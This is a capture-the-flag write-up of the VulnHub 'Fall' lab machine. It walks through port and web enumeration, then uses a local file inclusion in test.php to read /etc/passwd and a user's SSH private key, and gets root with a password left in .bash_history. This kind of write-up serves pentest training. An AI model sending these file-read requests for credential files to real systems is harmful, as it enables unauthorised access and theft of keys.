I saw a few people mention DIGITALWORLD.LOCAL: FALL on the VulnHub discord so thought I would give it a go.

Ports

A few here; mostly for distraction I guess?

  1. SSH
  2. HTTP
  3. SMB (139/443)
  4. HTTPS
  5. MYSQL on 3306, and
  6. Cockpit on 9090

I checked that mysql wasn’t accessible and there was nothing on the SMB server:

β”Œβ”€β”€(rootπŸ’€kali)-[/opt/vulnhub/fall]
└─# smbclient -L //192.168.1.97
Enter WORKGROUP\roots password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.8.10)
SMB1 disabled -- no workgroup available

And having established that was boring, moved on to…

HTTP

The website is running CMS Made Simple v. 2.2.15 which has several known exploits including SQLi and RCE but both require authentication, which we don’t have. One of the posts on the blog says:

Fellow administrators, stop polluting the webroot with all sorts of test scripts! This is production for heaven’s sake!

So, let’s fuzz for those?

β”Œβ”€β”€(rootπŸ’€kali)-[/opt/vulnhub/fall]
└─# feroxbuster -u http://192.168.1.97 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 200 -C 403 -x sh,php,py,txt --no-recursion

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            β”‚ http://192.168.1.97
 πŸš€  Threads               β”‚ 200
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/common.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’’  Status Code Filters   β”‚ [403]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.3.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [sh, php, py, txt]
 🚫  Do Not Recurse        β”‚ true
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menuβ„’
──────────────────────────────────────────────────
301        7l       20w      234c http://192.168.1.97/admin
301        7l       20w      235c http://192.168.1.97/assets
200        0l        0w        0c http://192.168.1.97/config.php
301        7l       20w      232c http://192.168.1.97/doc
200        3l        6w     1150c http://192.168.1.97/favicon.ico
200      296l      552w        0c http://192.168.1.97/index.php
301        7l       20w      232c http://192.168.1.97/lib
301        7l       20w      236c http://192.168.1.97/modules
200        1l        3w        0c http://192.168.1.97/phpinfo.php
200        7l       14w       79c http://192.168.1.97/robots.txt
200        5l        7w        0c http://192.168.1.97/test.php
301        7l       20w      236c http://192.168.1.97/uploads
301        7l       20w      232c http://192.168.1.97/tmp
[####################] - 7s     23510/23510   0s      found:13      errors:169    
[####################] - 7s     23510/23510   3247/s  http://192.168.1.97

Right, we’ve got test.php. What can we do with that? It says:

<html>
<body>
<script>alert('Missing GET parameter!');</script>
</body>
</html>

I fuzz it with Burp Turbo Intruder, initially with:

GET /test.php?%s=id HTTP/1.1

The parameter name file returns a 200 OK so I try

GET /test.php?file=/etc/passwd HTTP/1.1

This works, and we appear to have one user; qiu. It’s not too simple is it?

GET /test.php?file=/home/qiu/.ssh/id_rsa HTTP/1.1

Actually yes, we get the SSH private key.

Privesc

Our user is a sudoer, and has left his password in his .bash_history, so it’s game over:

[qiu@FALL ~]$ ls -lash                                                                     total 492K                                                                                    0 drwxr-xr-x. 4 qiu  qiu   200 Sep 13 03:19 .                                              0 drwxr-xr-x. 3 root root   17 Aug 14  2019 ..                                         4.0K -rw-------  1 qiu  qiu   292 Sep  5 19:30 .bash_history                               4.0K -rw-r--r--. 1 qiu  qiu    18 Mar 15  2018 .bash_logout                               4.0K -rw-r--r--. 1 qiu  qiu   193 Mar 15  2018 .bash_profile                               4.0K -rw-r--r--. 1 qiu  qiu   231 Mar 15  2018 .bashrc                                        0 drwx------  2 qiu  qiu    60 Sep 13 02:58 .gnupg                                     
4.0K -rw-r--r--  1 qiu  qiu    27 May 21 10:13 local.txt
4.0K -rw-------  1 qiu  qiu   118 Sep 13 03:19 .mysql_history
4.0K -rw-rw-r--  1 qiu  qiu    38 May 21 10:19 reminder
   0 drwxr-xr-x  2 qiu  qiu    61 May 21 11:49 .ssh
4.0K -rw-rw-r--  1 qiu  qiu   180 Sep 13 02:58 .wget-hsts
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history 
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu: 
Matching Defaults entries for qiu on FALL:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiu may run the following commands on FALL:
    (ALL) ALL
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
FALL
Mon Sep 13 03:21:03 PDT 2021
[root@FALL qiu]# cd /root
[root@FALL ~]# ls -lash
total 40K
   0 dr-xr-x---.  3 root root  206 Sep  5 20:54 .
   0 dr-xr-xr-x. 17 root root  244 May 21 17:55 ..
4.0K -rw-------.  1 root root 3.9K Aug 14  2019 anaconda-ks.cfg
4.0K -rw-------   1 root root   57 Sep  5 20:54 .bash_history
4.0K -rw-r--r--.  1 root root   18 Feb  9  2018 .bash_logout
4.0K -rw-r--r--.  1 root root  176 Feb  9  2018 .bash_profile
4.0K -rw-r--r--.  1 root root  176 Feb  9  2018 .bashrc
4.0K -rw-r--r--.  1 root root  100 Feb  9  2018 .cshrc
4.0K -rw-------.  1 root root 3.1K Aug 14  2019 original-ks.cfg
4.0K ----------   1 root root   30 May 21 10:22 proof.txt
4.0K -r--------   1 root root  452 Aug 30 05:08 remarks.txt
   0 drwx------   2 root root   25 Sep  5 19:39 .ssh
4.0K -rw-r--r--.  1 root root  129 Feb  9  2018 .tcshrc
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]# cat remarks.txt
Hi!

Congratulations on rooting yet another box in the digitalworld.local series!

You may have first discovered the digitalworld.local series from looking for deliberately vulnerably machines to practise for the PEN-200 (thank you TJ_Null for featuring my boxes on the training list!)

I hope to have played my little part at enriching your PEN-200 journey.

Want to find the author? Find the author on Linkedin by rooting other boxes in this series!
[root@FALL ~]#

Pretty straightforward if you dodge the rabbit holes.